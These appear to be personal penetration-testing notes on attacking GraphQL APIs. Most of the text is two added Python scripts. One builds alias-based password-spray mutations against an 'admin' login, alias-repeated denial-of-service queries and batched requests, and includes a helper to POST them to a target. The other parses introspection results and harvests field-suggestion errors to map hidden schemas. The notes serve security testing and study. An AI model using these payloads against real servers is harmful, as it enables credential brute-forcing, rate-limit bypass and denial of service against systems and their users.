GraphQL: an alternative to a traditional REST API for fetching data. The client names the fields it wants on an object type (roughly a table in a relational database), including related objects, and gets them back in a single request.
ORM stands for Object-Relational Mapping, a programming technique that lets developers work with data from relational databases using the object-oriented programming (OOP) structures they already know.
https://github.com/dolevf/graphw00f
systemUpdate query - a resource-heavy operation; repeating it (aliases, batching) can trigger DoS if the server has no query cost limit or timeout
Top-level query fields may be resolved in parallel; top-level mutation fields are executed serially, one after another (GraphQL spec)
Alias-based attacks - call the same field many times in one operation under different aliases (brute force, DoS) to bypass per-request rate limits
Query batching - send a JSON array of operations in one HTTP request; same effect where the server accepts batches
queries can be configured as mutations (and vice versa): the root type is only the schema author's choice, so a field under query may change state and one under mutation may only read - test what each actually does instead of trusting its root type
Three operation types: query (read), mutation (write), subscription (server-pushed events, usually over WebSocket)
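Added example (mine, not from these notes) showing how aliases and query batching pack many operations into one HTTP request. The `login(username, password) { token }` mutation, the resource-heavy `systemUpdate` query and the endpoint URL are assumptions; rename them to match the target schema.

```python
"""Alias-based and batched GraphQL payloads (added example, not from the notes).

Assumes a hypothetical `login(username, password) { token }` mutation and a
hypothetical resource-heavy `systemUpdate` query; rename to match the target.
"""
import json
import re
from typing import Dict, Iterable, List


def build_alias_query(field: str, arg_sets: Iterable[Dict], selection: str = "",
                      prefix: str = "a", operation: str = "query") -> str:
    """One operation that calls `field` once per arg set, each under a unique alias.

    The same field cannot appear twice with different arguments at one level
    unless each occurrence is aliased; every alias is resolved inside a single
    HTTP request, which is what defeats a per-request rate limit.
    """
    parts = []
    for i, args in enumerate(arg_sets):
        # json.dumps renders strings, ints and booleans as valid GraphQL literals
        rendered = ", ".join(f"{k}: {json.dumps(v)}" for k, v in args.items())
        call = f"{field}({rendered})" if rendered else field
        body = f" {selection}" if selection else ""
        parts.append(f"{prefix}{i}: {call}{body}")
    return f"{operation} {{ {' '.join(parts)} }}"


def build_batch(queries: Iterable[str]) -> List[Dict]:
    """Query batching: a JSON array of operations in one POST body.

    Servers that accept batches execute every element; a limiter that counts
    HTTP requests sees exactly one.
    """
    return [{"query": q} for q in queries]


def password_spray_payload(username: str, passwords: Iterable[str]) -> str:
    """N login attempts in one request. Top-level mutation fields are executed
    serially, so the aliases are evaluated in order."""
    return build_alias_query(
        "login",
        [{"username": username, "password": p} for p in passwords],
        selection="{ token }", prefix="attempt", operation="mutation")


def dos_alias_payload(field: str, count: int) -> str:
    """Repeat a resource-heavy field `count` times under aliases; without query
    cost limiting the server does `count` times the work for one request."""
    return build_alias_query(field, [{} for _ in range(count)], prefix="dos")


def count_aliases(query: str, prefix: str) -> int:
    """Sanity check: how many aliased calls a payload contains."""
    return len(re.findall(rf"\b{re.escape(prefix)}\d+:", query))


def post_graphql(url: str, body) -> dict:
    """Send a single operation ({"query": ...}) or a batch (list) as JSON."""
    import urllib.request
    req = urllib.request.Request(
        url, data=json.dumps(body).encode(), method="POST",
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=60) as resp:
        return json.load(resp)


if __name__ == "__main__":
    spray = password_spray_payload("admin", ["Winter2024!", "Password1", "admin"])
    print(spray)
    print(json.dumps(build_batch([dos_alias_payload("systemUpdate", 3)] * 2), indent=2))
    # Only against a target you are authorised to test (hypothetical URL):
    # print(post_graphql("https://target.example/graphql", {"query": spray}))
```

Watch the response for per-alias errors: a server that rejects the whole request with a "too many aliases" or query-complexity error has a defence in place; one that returns N results has none.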
Tip
Filter by response body: in Burp's HTTP history, filter on the response body with a regex (e.g. "errors" or "Did you mean") to surface the GraphQL responses worth inspecting
Mutations
Todo
Learn to read results from introspection queries (types, fields, argument types; which fields live under Mutation)
Manual mutations are the money makers: mutations change state, so hand-crafted ones (checking authorization on each) are where the high-impact findings are
Field suggestions: when a query names a field that does not exist, graphql-js and its ports reply with the closest valid name ('Cannot query field "x" on type "Query". Did you mean "y"?'), so wrong guesses leak the schema even with introspection disabled
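Added example (mine, not from these notes) for the two points above: turning an introspection result into a readable field listing, and harvesting names from "Did you mean" suggestions when introspection is off. The schema and the error messages are constructed sample data shaped like graphql-js output; other servers may word suggestions differently.

```python
"""Reading introspection output and harvesting field suggestions
(added example, not from the notes; all sample data below is constructed)."""
import re
from typing import Dict, List

# Compact introspection query: root types plus every field with args and types.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name } mutationType { name } subscriptionType { name }
    types {
      kind name
      fields { name args { name type { ...TypeRef } } type { ...TypeRef } }
    }
  }
}
fragment TypeRef on __Type {
  kind name ofType { kind name ofType { kind name ofType { kind name } } }
}
"""


def _ref(kind, name=None, of=None):
    """Build a __Type reference as the server would return it."""
    return {"kind": kind, "name": name, "ofType": of}


STR = _ref("SCALAR", "String")

# Constructed sample: what a server might return for INTROSPECTION_QUERY.
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
    "subscriptionType": None,
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "users", "args": [{"name": "limit", "type": _ref("SCALAR", "Int")}],
             "type": _ref("LIST", of=_ref("OBJECT", "User"))},
            {"name": "systemUpdate", "args": [], "type": STR}]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            {"name": "login", "args": [
                {"name": "username", "type": _ref("NON_NULL", of=STR)},
                {"name": "password", "type": _ref("NON_NULL", of=STR)}],
             "type": _ref("OBJECT", "AuthPayload")},
            {"name": "deleteUser",
             "args": [{"name": "id", "type": _ref("NON_NULL", of=_ref("SCALAR", "ID"))}],
             "type": _ref("SCALAR", "Boolean")}]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "id", "args": [], "type": _ref("SCALAR", "ID")},
            {"name": "email", "args": [], "type": STR}]},
        {"kind": "OBJECT", "name": "AuthPayload", "fields": [
            {"name": "token", "args": [], "type": STR}]},
        {"kind": "SCALAR", "name": "String", "fields": None},
        {"kind": "OBJECT", "name": "__Schema", "fields": []},
    ]}}}

# Constructed sample: errors for a query that guessed wrong names.
SAMPLE_ERROR_RESPONSE = {"errors": [
    {"message": 'Cannot query field "usr" on type "Query". Did you mean "users"?'},
    {"message": 'Cannot query field "sysUpdate" on type "Query". Did you mean "systemUpdate"?'},
    {"message": 'Unknown argument "user" on field "Mutation.login". Did you mean "username"?'},
    {"message": 'Unknown argument "pass" on field "Mutation.login". Did you mean "password" or "username"?'},
]}


def render_type_ref(ref: Dict) -> str:
    """NON_NULL/LIST wrappers back to SDL notation, e.g. [String!]!"""
    if ref["kind"] == "NON_NULL":
        return render_type_ref(ref["ofType"]) + "!"
    if ref["kind"] == "LIST":
        return "[" + render_type_ref(ref["ofType"]) + "]"
    return ref["name"]


def root_types(introspection: Dict) -> Dict[str, str]:
    """Map root type name -> operation keyword (query/mutation/subscription)."""
    schema = introspection["data"]["__schema"]
    return {schema[k]["name"]: k[:-4]
            for k in ("queryType", "mutationType", "subscriptionType") if schema.get(k)}


def summarize_schema(introspection: Dict) -> Dict[str, List[str]]:
    """Object type -> ['field(arg: Type): ReturnType', ...], skipping __ types."""
    summary = {}
    for t in introspection["data"]["__schema"]["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__") or not t.get("fields"):
            continue
        sigs = []
        for f in t["fields"]:
            args = ", ".join(f"{a['name']}: {render_type_ref(a['type'])}" for a in f.get("args") or [])
            sigs.append(f"{f['name']}({args}): {render_type_ref(f['type'])}" if args
                        else f"{f['name']}: {render_type_ref(f['type'])}")
        summary[t["name"]] = sigs
    return summary


def extract_suggestions(errors: List[Dict]) -> List[str]:
    """Pull every quoted name out of 'Did you mean ...?' messages, deduplicated."""
    names: List[str] = []
    for err in errors:
        m = re.search(r"Did you mean (.+?)\?", err.get("message", ""))
        for n in re.findall(r'"([^"]+)"', m.group(1)) if m else []:
            if n not in names:
                names.append(n)
    return names


def probe_query(guesses: List[str]) -> str:
    """Query that names guessed fields purely to provoke suggestions."""
    return "query { " + " ".join(guesses) + " }"


if __name__ == "__main__":
    for type_name, sigs in summarize_schema(SAMPLE_INTROSPECTION).items():
        print(f"{type_name} ({root_types(SAMPLE_INTROSPECTION).get(type_name, 'object')})")
        for sig in sigs:
            print("  ", sig)
    print("suggested:", extract_suggestions(SAMPLE_ERROR_RESPONSE["errors"]))
    print(probe_query(["usr", "sysUpdate"]))
```

The Mutation section of the summary is the list to work through by hand; the suggestion harvester feeds the next round of guesses when introspection is disabled.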